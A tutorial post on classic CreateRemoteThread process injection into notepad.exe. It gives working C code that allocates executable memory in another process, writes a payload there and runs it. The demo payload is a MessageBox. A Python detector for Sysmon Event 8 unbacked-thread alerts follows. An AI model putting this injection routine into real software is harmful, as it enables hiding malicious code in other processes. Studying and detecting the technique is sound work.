Classic Payload Injection (CreateRemoteThread)

I am continuing the last post regarding process enumeration, which we use to find the target process that will become the host of our payload.

After we get the target process PID, we can try to open that process with the code below. The PID is the process ID we obtained from the enumeration.

// Open the target with only the rights the injection needs: create a thread,
// query basic info, and allocate/read/write its virtual memory.
hProc = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
                    PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE,
                    FALSE, (DWORD)pid);

When the above call succeeds, we go further and inject the payload by creating a thread in the target process.

Below is the very basic remote thread injection code. I believe this code will trigger a lot of alerts, so be careful when using it.

// Returns 0 when the remote thread was created, -1 on any failure.
int Inject(HANDLE hProc, unsigned char* payload, unsigned int payload_len) {

	LPVOID pRemoteCode = NULL;
	HANDLE hThread = NULL;

	// Allocate an executable region in the target process for the payload.
	pRemoteCode = VirtualAllocEx(hProc, NULL, payload_len, MEM_COMMIT, PAGE_EXECUTE_READ);
	if (pRemoteCode == NULL) {
		return -1;
	}

	// Copy the payload bytes into the newly allocated region.
	if (!WriteProcessMemory(hProc, pRemoteCode, (PVOID)payload, (SIZE_T)payload_len, (SIZE_T*)NULL)) {
		return -1;
	}

	// Start a thread in the target whose entry point is the copied payload.
	hThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteCode, NULL, 0, NULL);
	if (hThread != NULL) {
		WaitForSingleObject(hThread, 500);
		CloseHandle(hThread);
		return 0;
	}

	return -1;
}

The above code allocates a new memory region in the target process with VirtualAllocEx, with execute permission (PAGE_EXECUTE_READ). Once the region exists, the payload is copied into it with WriteProcessMemory. If the copy succeeds, a thread is started in the target process at that address with CreateRemoteThread.

We can see the notepad.exe threads in Process Hacker before the payload is injected, as below.

We can compare the threads after we execute the injection.

The payload is successfully executed in the newly created thread within the notepad.exe process. The payload we inject executes MessageBox, as below. In the details of thread 7728 we can see the MessageBox API being called.
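Seen from the defender's side, the same sequence leaves a clear trace: the new thread's start address lies in private memory that no loaded module backs, which is what Process Hacker shows above and what Sysmon Event ID 8 (CreateRemoteThread) records with StartModule and StartFunction set to "-". The following is an added example, not code from the original post: it parses constructed Event 8 messages and flags that pattern. All paths, PIDs and addresses in the sample are invented.

```python
import re
from typing import Dict, List

# Constructed Sysmon Event ID 8 messages, one "Key: Value" field per line as
# Sysmon formats them. The first event mimics the injection in this post; the
# second is a benign remote thread whose start address resolves to ntdll.dll.
SAMPLE_LOG = r"""
SourceProcessId: 4242
SourceImage: C:\Users\lab\injector.exe
TargetProcessId: 5150
TargetImage: C:\Windows\System32\notepad.exe
NewThreadId: 7728
StartAddress: 0x000001C3D2A50000
StartModule: -
StartFunction: -

SourceProcessId: 812
SourceImage: C:\Windows\System32\svchost.exe
TargetProcessId: 5150
TargetImage: C:\Windows\System32\notepad.exe
NewThreadId: 6001
StartAddress: 0x00007FFD1A2B3C40
StartModule: C:\Windows\System32\ntdll.dll
StartFunction: EtwpCreateEtwThread
"""

FIELD_RE = re.compile(r"^(\w+):\s*(.*)$")


def load_events(text: str) -> List[Dict[str, str]]:
    """Split blank-line separated events and parse their Key: Value fields."""
    events = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields = {}
        for line in block.splitlines():
            m = FIELD_RE.match(line.strip())
            if m:
                fields[m.group(1)] = m.group(2).strip()
        if fields:
            events.append(fields)
    return events


def is_unbacked_remote_thread(ev: Dict[str, str]) -> bool:
    """True when the thread starts outside every mapped image: Sysmon writes '-'
    for StartModule when the address is private memory, exactly what
    VirtualAllocEx + WriteProcessMemory + CreateRemoteThread produces."""
    return ev.get("StartModule", "-") in ("", "-")


def triage(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return the events matching the injection pattern, with a reason attached."""
    return [{**ev, "Reason": "remote thread start address not backed by a module"}
            for ev in events if is_unbacked_remote_thread(ev)]
```

Running `triage(load_events(SAMPLE_LOG))` returns only the first event, the one whose start address has no backing module; the ntdll.dll-backed thread is not flagged.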
